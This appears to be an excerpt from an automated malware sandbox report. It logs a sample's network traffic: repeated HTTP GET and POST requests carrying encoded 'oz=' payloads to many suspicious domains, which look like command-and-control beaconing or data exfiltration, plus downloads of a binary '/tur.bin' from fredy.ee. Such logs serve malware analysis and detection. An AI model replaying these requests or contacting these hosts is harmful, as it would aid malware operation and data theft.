oz=qRo7UWlGE2pUj3lGsy3ckDJgA+yOsnkMDrhTBA7DTrQ+Itxdw6ZmZRbf0fTo3rI6IezrLhhRAUbQ5BpKjWzOnTg4zmc48zm8iKBqUX9ZBUgBsqJ6OE8boouf3n3zbauzJhoez6gc4Uuw7ogstcwxaxtCP9OGxhmuNu4jYnJ3tr/z0IvoildZe5pIOptKtPqP0ePRQOUI4WwFoMCu5GTxOaM=
        Source: global trafficHTTP traffic detected: POST /txr6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.ngmr.xyzOrigin: http://www.ngmr.xyzReferer: http://www.ngmr.xyz/txr6/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 33 6c 47 73 79 33 63 6b 44 4a 67 41 2b 79 4f 73 6e 6b 4d 44 72 68 54 42 41 37 44 54 72 59 2b 49 65 35 64 78 63 52 6d 59 52 62 66 76 66 54 70 33 72 4a 2f 49 65 72 76 4c 68 73 73 41 52 66 51 34 69 68 4b 32 53 66 4f 2b 44 67 34 75 57 63 35 34 7a 6d 54 69 4f 6c 75 55 58 74 5a 42 55 67 42 73 70 42 36 4f 56 38 62 71 6f 75 51 30 6e 33 76 66 61 76 65 4a 68 77 67 7a 37 68 72 37 6c 4f 77 37 4a 51 73 76 75 49 78 48 68 74 41 44 64 4f 65 78 68 37 70 4e 74 63 4a 59 6d 39 5a 74 6f 76 7a 6e 34 71 32 79 57 70 39 66 75 52 41 4f 62 39 33 6e 2f 69 7a 36 5a 2f 6f 57 73 34 67 77 78 30 76 75 75 57 67 6f 32 66 78 50 65 67 59 41 62 2f 44 6e 6c 79 70 62 78 79 6f 2b 62 51 6c 2b 38 76 51 71 2f 62 55 51 61 74 70 46 57 33 50 7a 49 53 50 46 67 73 63 45 6c 43 35 46 4e 43 4d 35 73 48 36 32 33 42 39 36 6c 76 42 36 46 32 4b 47 65 58 50 65 31 75 45 39 4b 34 74 35 79 4b 49 73 56 5a 4b 2f 73 56 61 76 6a 76 7a 59 74 30 77 69 33 6e 34 31 4f 72 41 36 6e 41 4b 2b 4e 70 2b 77 41 66 41 78 39 33 75 35 4d 62 64 6b 46 72 35 56 62 4a 6d 63 54 65 57 6f 72 36 67 31 47 6f 75 2b 53 58 53 51 49 6b 74 2f 38 6d 2b 4b 59 78 67 46 41 75 4a 70 63 45 70 2b 70 6c 2b 39 46 34 78 43 37 53 42 70 66 44 67 6d 79 4a 71 66 79 36 79 39 70 52 42 30 32 78 42 53 36 6b 67 4a 6e 49 4f 70 41 78 53 75 78 58 36 70 46 53 57 59 53 31 58 43 7a 5a 4e 4d 74 4c 49 64 33 56 6b 
79 7a 35 4b 78 6f 56 6e 62 77 48 62 4b 42 38 46 6d 47 51 6a 31 66 57 48 66 75 41 54 46 46 2b 42 41 66 2b 79 57 6f 6d 58 69 4f 66 57 76 2b 77 63 50 31 4a 37 4a 77 6a 48 39 61 38 32 77 61 43 76 51 78 68 69 6a 74 2b 5a 55 4d 33 78 78 50 45 7a 47 50 49 33 51 7a 49 5a 42 5a 37 66 34 35 44 62 7a 6d 45 36 44 51 6e 52 52 51 42 4f 44 51 61 42 78 76 56 41 34 36 52 66 73 6f 6a 52 45 65 79 61 59 45 64 46 73 4c 39 30 6b 65 48 52 66 38 68 4c 71 67 6f 4a 7a 58 59 33 52 58 54 4e 4e 2f 79 76 31 47 66 39 35 55 2b 77 55 48 2f 65 4b 4c 72 47 56 33 7a 36 6a 61 30 62 5a 53 47 6e 49 61 6f 79 4e 73 66 48 49 59 6c 4e 76 61 55 57 50 63 61 35 71 68 30 4a 32 45 59 35 6c 47 53 54 6b 68 6e 4f 43 74 37 6d 6b 64 55 55 4f 2b 45 30 6d Data Ascii: oz=qRo7UWlGE2pUj3lGsy3ckDJgA+yOsnkMDrhTBA7DTrY+Ie5dxcRmYRbfvfTp3rJ/IervLhssARfQ4ihK2SfO+Dg4uWc54zmTiOluUXtZBUgBspB6OV8bqouQ0n3vfaveJhwgz7hr7lOw7JQsvuIxHhtADdOexh7pNtcJYm9Ztovzn4q2yWp9fuRAOb93n/iz6Z/oWs4gwx0vuuWgo2fxPegYAb/Dnlypbxyo+bQl+8vQq/bUQatpFW3PzISPFgscElC5FNCM5sH623B96lvB6F2KGeXPe1uE9K4t5yKIsVZK/s
        Source: global traffic HTTP traffic detected: GET /txr6/?oz=nTAbXiRbAR9Tmn1EygfckhJ8auTVp3cQBZgFAHmQGrw0Kpxo+btzHXTBwKiLhdY3AsfxfRA0GE/MmBFG+RiimQs6glJH3Tq6ibBpV287KGVZpLZHDS41jcE=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.ngmr.xyz Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /7cy1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.albero-dveri.online Origin: http://www.albero-dveri.online Referer: http://www.albero-dveri.online/7cy1/ Content-Length: 199 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /7cy1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.albero-dveri.online Origin: http://www.albero-dveri.online Referer: http://www.albero-dveri.online/7cy1/ Content-Length: 219 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /7cy1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.albero-dveri.online Origin: http://www.albero-dveri.online Referer: http://www.albero-dveri.online/7cy1/ Content-Length: 7367 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: GET /7cy1/?oz=NuunJUERQovrcOQM4pbN0sXyOdFy/3jSqqQUAe4+iYgeK7ulJS9OoncvbeOag3vILBHdN8yfojyADwDpW/rc4czucw94LLL42y8tkGUt2pDt0O2/v+PPRf0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.albero-dveri.online Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /qjs8/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.typ67.top Origin: http://www.typ67.top Referer: http://www.typ67.top/qjs8/ Content-Length: 199 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /qjs8/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.typ67.top Origin: http://www.typ67.top Referer: http://www.typ67.top/qjs8/ Content-Length: 219 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /qjs8/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.typ67.top Origin: http://www.typ67.top Referer: http://www.typ67.top/qjs8/ Content-Length: 7367 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: GET /qjs8/?oz=ejIma/W1pGRFx7ChnTgroDHkNn1VdqZgcszQV8LCwj4556o206I/YZ5OId3qzm2jECDslwuStodYNwU7Ng5KBO4as1dQdJVJJimzghFMohwqM9lhe6W/0oM=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.typ67.top Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /phvf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.greekhause.org Origin: http://www.greekhause.org Referer: http://www.greekhause.org/phvf/ Content-Length: 199 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /phvf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.greekhause.org Origin: http://www.greekhause.org Referer: http://www.greekhause.org/phvf/ Content-Length: 219 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /phvf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.greekhause.org Origin: http://www.greekhause.org Referer: http://www.greekhause.org/phvf/ Content-Length: 7367 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: GET /phvf/?oz=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.greekhause.org Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /d84b/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.dorikis.online Origin: http://www.dorikis.online Referer: http://www.dorikis.online/d84b/ Content-Length: 199 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /d84b/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.dorikis.online Origin: http://www.dorikis.online Referer: http://www.dorikis.online/d84b/ Content-Length: 219 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: POST /d84b/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.dorikis.online Origin: http://www.dorikis.online Referer: http://www.dorikis.online/d84b/ Content-Length: 7367 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic HTTP traffic detected: GET /d84b/?oz=LDMXP2ida3jj6Wv8YbWYWcXQGJdr9fjlzYlCdzHaAPX6jElzFVuifqg0YZMPIM8JGTBjffDneHOFDPAe46iMAyLvyO9+lRB2GxTtOnRawDOQ6U7+wx9GICg=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.dorikis.online Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: global traffic HTTP traffic detected: GET /tur.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: fredy.ee Connection: Keep-Alive
        Source: global traffic HTTP traffic detected: GET /tur.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: fredy.ee Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /tcs6/?oz=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.invicta.worldConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /bqye/?UJ9=qN-llTKPHxntPrv0&oz=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.whats-in-the-box.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /was5/?oz=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.linkwave.cloudConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /7k8f/?oz=1xd2XIdTc2qaFZ+FWSTYli7OxzQOBufybu6t7KDIboRfwcHmUmPthK5WfpWTXJmR/FSLDU2eJw9bxVvh/BR2RAGhDgY7k/sU7CIWPHYqUL7qqxcngXtaZyk=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dfmagazine.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /txr6/?oz=nTAbXiRbAR9Tmn1EygfckhJ8auTVp3cQBZgFAHmQGrw0Kpxo+btzHXTBwKiLhdY3AsfxfRA0GE/MmBFG+RiimQs6glJH3Tq6ibBpV287KGVZpLZHDS41jcE=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.ngmr.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /7cy1/?oz=NuunJUERQovrcOQM4pbN0sXyOdFy/3jSqqQUAe4+iYgeK7ulJS9OoncvbeOag3vILBHdN8yfojyADwDpW/rc4czucw94LLL42y8tkGUt2pDt0O2/v+PPRf0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.albero-dveri.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /qjs8/?oz=ejIma/W1pGRFx7ChnTgroDHkNn1VdqZgcszQV8LCwj4556o206I/YZ5OId3qzm2jECDslwuStodYNwU7Ng5KBO4as1dQdJVJJimzghFMohwqM9lhe6W/0oM=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.typ67.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /phvf/?oz=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.greekhause.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /qo4k/?oz=36KtwjIDafomy9tqOdqNwmsTn0KS8yDqwBoT0TnhmWNBmrcWA57j581r3y6lS3Ypxl7bXHdk4WhS3KsNzHZbX1L1UxoK9zL5luuQrcJM9iAor4hALAJtoKM=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.platinumkitchens.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /yyvd/?oz=NqcJB3pZzzicH1g7OCf+o29R25c64Oc8uERdjrOnv2081dkqh5dbyixi1IWdR8hocD/pCHEuLxSxGQJUj5oKb5xJ79EhBhZUZc8Ysxx7YEgkHTlCWWMUk7k=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dhkatp.vipConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /iydt/?oz=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z+iB4Tcv9O6cZB31p1Mi5MvPz0n4i/4vc8VuesM/xDDO+6C7ZbX/5xARUztqgUqGu06GFp6xk=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tempatmudisini01.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /qwk1/?oz=zuS7aiF7UCmUZEGCFTElZNoc1TsXMIUH7bJjsGqWHOHqpoebjKjp7AEKoIo96ikD3t7upPrvfpp3YpWkIK1WRnsiE3z7WHp76C45XcEHI5LxV+/vcHJ1HMs=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.komart.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /ytua/?oz=eEoKyIBkgP1r3UaSX5x2BcdCaSeQE0m7SIzn6MAF2Eoa7eZjgA7VjWJ9hDDUm15GkCbg2BHkZRaH6Ojl2CuAMP081j8WR4/cwGyXJgzH3SFq+T0y0nykltc=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dxeg.lolConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /dlt0/?oz=9mltyUpqTpNFGgiLLM/QIt0JA1EyaLVwbNO6LVK8xMKAahqO0kx85NrrrztI4+WdJ+WmFSXeCNM39PHdIGjD1nD8ckOcgacQtsimUjnJeyDglSYeX59cdP4=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tukaari.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: unknown HTTP traffic detected: POST /bqye/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.whats-in-the-box.org Origin: http://www.whats-in-the-box.org Referer: http://www.whats-in-the-box.org/bqye/ Content-Length: 199 Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36 Data Ascii: oz=lpp2G9wZJQS0MlGRsWnVtSTc2OoujJdPs8tz4LUGUp85oIUzzJPc9UtE5b8lPuD8o17QtYlE++WjwKPRiUfEquo18cEgU1V92kXxu1GTOWl92J6L1PWTNuBYn7CF/mK+e7ODitQZRyrUbupATCvQUVXxOygiWWoaTh4LlwSjp5OZPEzFJ4IImrhpwJOfHYP0cw==
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=iso-8859-1 Content-Length: 282 Accept-Ranges: bytes Date: Fri, 04 Oct 2024 06:30:47 GMT X-Varnish: 1110522503 Age: 0 Via: 1.1 varnish Connection: close X-Varnish-Cache: MISS Server: C2M Server v1.02 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
